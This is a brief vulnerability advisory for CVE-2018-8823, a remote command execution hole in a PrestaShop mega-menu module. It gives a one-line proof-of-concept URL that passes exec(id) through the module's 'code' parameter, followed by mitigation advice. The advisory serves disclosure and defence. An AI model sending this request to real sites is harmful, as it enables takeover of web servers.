IA Informática Valencia

First Remote Command Execution in Prestashop

CVE Ref: CVE-2018-8823
Release Date: 2018/03/06
Discover Credits: Andrea Iodice
Bulletin Author:  IA - Informática Avanzada
Contact: andrea@ia-informatica.com
Type: Remote Command Execution
Level: High 
Vulnerable Application: Prestashop (1.5.5.0 - 1.7.2.5)

Overview:
Responsive Mega Menu (Horizontal+Vertical+Dropdown) Pro
is a Module present in PrestaShop Addons Marketplace that allow multiple vulnerabilities.

Scope:
File: /modules/bamegamenu/ajax_phpcode.php
Vulnerable Argument(s): $_POST[´code´]  or $_GET[´code´]

Proof of Concept:
GET: http://<site>/modules/bamegamenu/ajax_phpcode.php?code=echo exec(id);

Description:
The referred vulnerability could be exploited through a url. The attacker could take complete control of the web server

Solutions:
Disable function exec(), passthru(), shell_exec(), system(), delete or edit the vulnerable file.

Contact Us

Powered by

Linux Apache PHP Mysql Metasploit HTML5